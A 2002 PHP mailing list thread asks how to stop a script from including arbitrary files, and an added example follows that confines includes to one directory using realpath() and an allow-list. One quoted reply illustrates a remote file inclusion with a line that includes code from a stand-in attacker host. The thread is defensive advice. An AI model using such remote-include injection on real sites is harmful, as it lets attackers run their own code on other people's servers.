erm......would that allow hackers access? Say I have a database include file, would hackers be able to get access to my database like this?
(include('http://mysite.com/datainc.php');)

I hope bloody not!!! If so, how on earth do I get round that!

John

On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> Use realpath() to check the path. I also suspect your script is
> vulnerable to cross-site includes
> (include('http://hacker.com/script.inc');)
>
> Rick Beckman wrote:
> >Okay, I was mistaken... There is a gaping security hole in my simple li'l
> >script... How do I modify it to only accept files from a certain path? I
> >want the url format to be script.php?call=1 where "1" is the called file
> > in the /includes/ directory. Just when I get optimistic I leave the
> > entire system exposed. Yeah, that fits with my luck. :-)

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
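
The realpath() check suggested in the thread, applied to the script.php?call=1 layout Rick describes, as an added example that is not code from the thread. The function name `resolve_include`, the `.php` file extension and the location of the includes directory beside the script are assumptions.

```php
<?php
// Added example, not code from the thread. Assumptions: included files live in
// an "includes" directory beside this script and are named <call>.php.

/**
 * Map the user-supplied ?call= value to a file inside $baseDir.
 * Returns the absolute path, or null when the request must be refused.
 */
function resolve_include(string $call, string $baseDir): ?string
{
    // Allow-list the name itself: no slashes, dots, URL schemes or NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $call)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory is missing
    }

    // realpath() resolves "..", "." and symlinks, and returns false when the
    // file does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $call . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }

    // The resolved path must still sit under the base directory. The trailing
    // separator stops "/includes_old/x.php" from matching "/includes".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$call = $_GET['call'] ?? '';
$file = is_string($call) ? resolve_include($call, __DIR__ . '/includes') : null;

if ($file === null) {
    http_response_code(404);
    exit('Not found');
}
include $file;
```

Independently of this check, `allow_url_include = Off` in php.ini (the default in current PHP releases) stops include() from fetching http:// URLs at all.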